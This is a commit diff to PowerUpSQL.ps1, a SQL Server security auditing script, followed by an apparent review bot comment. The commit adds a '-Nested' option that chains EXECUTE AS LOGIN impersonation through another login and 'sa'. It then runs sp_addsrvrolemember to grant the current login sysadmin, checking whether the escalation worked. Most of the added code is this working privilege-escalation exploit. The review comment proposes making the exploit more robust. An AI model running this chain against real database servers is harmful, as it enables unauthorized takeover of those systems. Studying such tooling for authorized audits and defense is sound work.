
Commit 690b788

committed
Nested Function
Added Nested Function (under Invoke-SQLAuditPrivImpersonateLogin)
1 parent a4752bf commit 690b788


1 file changed

+45
-1
lines changed


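--- a/PowerUpSQL.ps1
+++ b/PowerUpSQL.ps1
@@ -21854,6 +21854,8 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 Don't output anything.
 .PARAMETER Exploit
 Exploit vulnerable issues
+.PARAMETER Nested
+Exploit Nested Impersonation Capabilites
 .EXAMPLE
 PS C:\> Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123!
 
@@ -21917,7 +21919,11 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 
 [Parameter(Mandatory = $false,
 HelpMessage = 'Exploit vulnerable issues.')]
-[switch]$Exploit
+[switch]$Exploit,
+
+[Parameter(Mandatory = $false,
+HelpMessage = 'Exploit Nested Impersonation Capabilites.')]
+[switch]$Nested
 )
 
 Begin
@@ -22069,6 +22075,44 @@ Function Invoke-SQLAuditPrivImpersonateLogin
 Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
 $Exploited = 'No'
 }
+}
+# ---------------------------------------------------------------
+# Exploit Nested Impersonation Vulnerability
+# ---------------------------------------------------------------
+if($Nested)
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: Starting Nested Impersonation exploit process (under assumption to levels of nesting and 1st first can impersonate sa)..."
+
+# Check if user is already a sysadmin
+$SysadminPreCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
+if($SysadminPreCheck -eq 0)
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: Verified that the current user ($CurrentLogin) is NOT a sysadmin."
+Write-Verbose -Message "$Instance : - EXPLOITING: Attempting to add the current user ($CurrentLogin) to the sysadmin role..."
+
+# Attempt to add the current login to sysadmins fixed server role
+$null = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"
+
+# Verify the login was added successfully
+$SysadminPostCheck = Get-SQLQuery -Instance $Instance -Username $Username -Password $Password -Credential $Credential -Query "SELECT IS_SRVROLEMEMBER('sysadmin','$CurrentLogin') as Status" -SuppressVerbose | Select-Object -Property Status -ExpandProperty Status
+if($SysadminPostCheck -eq 1)
+{
+Write-Verbose -Message "$Instance : - EXPLOITING: It was possible to make the current user ($CurrentLogin) a sysadmin!"
+$Exploited = 'Yes'
+}
+else
+{
+Write-Verbose -Message "$Instance : - EXPLOITING: It was not possible to make the current user ($CurrentLogin) a sysadmin."
+}
+}
+else
+{
+# Status user
+Write-Verbose -Message "$Instance : - EXPLOITING: The current login ($CurrentLogin) is already a sysadmin. No privilege escalation needed."
+$Exploited = 'No'
+}
 }
 }
 else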
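Review bot: The new `-Nested` path at 22096 hard-codes `'sa'` as the second impersonation hop and, per its own verbose message at 22085, silently assumes exactly two levels of nesting with the first hop able to impersonate sa — on an instance where sa is renamed or the usable chain ends at a different sysadmin login the exploit fails without explaining why, so the intermediate target should be a parameter (e.g. `[string]$NestedLogin = 'sa'`) and the query become `-Query "EXECUTE AS LOGIN = '$ImpersonatedLogin';EXECUTE AS LOGIN = '$NestedLogin';EXEC sp_addsrvrolemember '$CurrentLogin','sysadmin'"`. The `}` added at 22078 closes the block that held the existing exploit logic before the `if($Nested)` opens, which looks like it makes `-Nested` run without `-Exploit` being set; if that is unintended, gate it with `if($Nested -and $Exploit)` or document that `-Nested` implies exploitation. The help text at 21858/21925 misspells "Capabilities", and the verbose message at 22085 should read "under the assumption of two levels of nesting and that the first hop can impersonate sa". The enclosing Invoke-SQLAuditPrivImpersonateLogin function, including where `$ImpersonatedLogin` is assigned, begins and ends outside these hunks.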
